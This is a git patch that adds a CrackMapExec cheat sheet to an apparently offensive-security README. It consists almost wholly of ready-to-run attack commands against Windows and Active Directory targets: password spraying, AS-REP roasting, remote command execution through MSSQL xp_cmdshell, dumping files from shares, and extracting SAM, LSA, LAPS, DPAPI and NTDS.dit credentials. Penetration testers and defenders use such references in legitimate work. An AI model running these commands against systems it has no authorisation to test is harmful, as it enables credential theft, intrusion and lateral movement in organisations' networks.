From 923461ebd32d2b8d7c4d369f6fc120abc90eaefd Mon Sep 17 00:00:00 2001 From: Ahmed Amine <55143192+seriotonctf@users.noreply.github.com> Date: Fri, 1 Sep 2023 12:30:29 +0100 Subject: [PATCH] added crackmapexec cheat sheet --- README.md | 140 ++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 140 insertions(+) diff --git a/README.md b/README.md index ea3cdc0..453b362 100644 --- a/README.md +++ b/README.md @@ -731,6 +731,146 @@ Get Hashes bash$ cme smb -u username -p password --sam ``` +## CrackMapExec Cheat Sheet +### Initial Enumeration +```bash +crackmapexec smb +``` + +### Testing null/guest authentication and listing shares +```bash +crackmapexec smb targets.txt -u '' -p '' --shares +``` + +```bash +crackmapexec smb targets.txt -u 'Guest' -p '' --shares +``` + +### Enumerate users using ldap +```bash +crackmapexec ldap -u '' -p '' --users +``` + +```bash +crackmapexec ldap -u users.txt -p "" -k +``` + +### Asreproast +```bash +crackmapexec ldap -u -p "" --asreproast asrep.txt +``` + +### Bloodhound +```bash +crackmapexec ldap -u -p --bloodhound -ns --collection All +``` + +### Group Policy Preferences +- https://www.thehacker.recipes/ad/movement/credentials/dumping/group-policies-preferences +```bash +crackmapexec smb -u -p -M gpp_password +``` + +### Creds Spray +```bash +crackmapexec smb targets.txt -u -p +``` + +### Password Spray +```bash +crackmapexec ldap -u users.txt -p --continue-on-success +``` + +```bash +crackmapexec ldap -u users.txt -p --no-bruteforce --continue-on-success +``` + +### STATUS_NOT_SUPPORTED: NTLM protocol not supported +In this case we can use the `-k` option which will use Kerberos protocol to authenticate. +```bash +crackmapexec smb targets.txt -u -p -k +``` + +### List shares +```bash +crackmapexec smb targets.txt -u -p -k --shares +``` + +### Spider_plus Module +The module `spider_plus` allows you to list and dump all files from all readable shares +#### List all readable files +```bash +crackmapexec smb -u -p -k -M spider_plus +``` + +#### Dump all files +```bash +crackmapexec smb -u -p -M spider_plus -o READ_ONLY=false +``` + +#### Dump a specific file +```bash +crackmapexec smb -u -p -k --get-file --share +``` + + +### MSSQL +#### Test authentication +```bash +crackmapexec mssql targets.txt -u -p +``` + +#### Execute commands using `xp_cmdshell` +- `-X` for powershell and `-x` for cmd +```bash +crackmapexec mssql -u -p -X +``` + +#### Get a file +```bash +crackmapexec mssql -u -p --get-file +``` + +### Local Administrator authentication +```bash +crackmapexec smb -u -p --local-auth +``` + +### Dump the LSA secrets +```bash +crackmapexec smb -u -p --local-auth --lsa +``` + +### Recover the name of the gmsa account +- https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-5-golden-gmsa-trust-attack-from-child-to-parent +We have two possibilities to recover the name of the gmsa account: +- Using the `--gmsa-convert-id` option: +```bash +crackmapexec ldap -u -p --gmsa-convert-id +``` +- Decrypt the gmsa account in lsa with `--gmsa-decrypt-lsa`: +```bash +crackmapexec ldap -u -p --gmsa-decrypt-lsa +``` + +### Dump LAPS password +```bash +crackmapexec smb targets.txt -u -p --laps +``` + +### Dump the credentials of the dpapi +```bash +crackmapexec smb targets.txt -u -p --laps --dpapi +``` + +### Dump NTDS.dit +```bash +crackmapexec smb -u -p --ntds +``` + +### References +- https://github.com/mpgn/CrackMapExec +- https://wiki.porchetta.industries/smb-protocol/scan-for-vulnerabilities ## Crackmapexec to Empire agent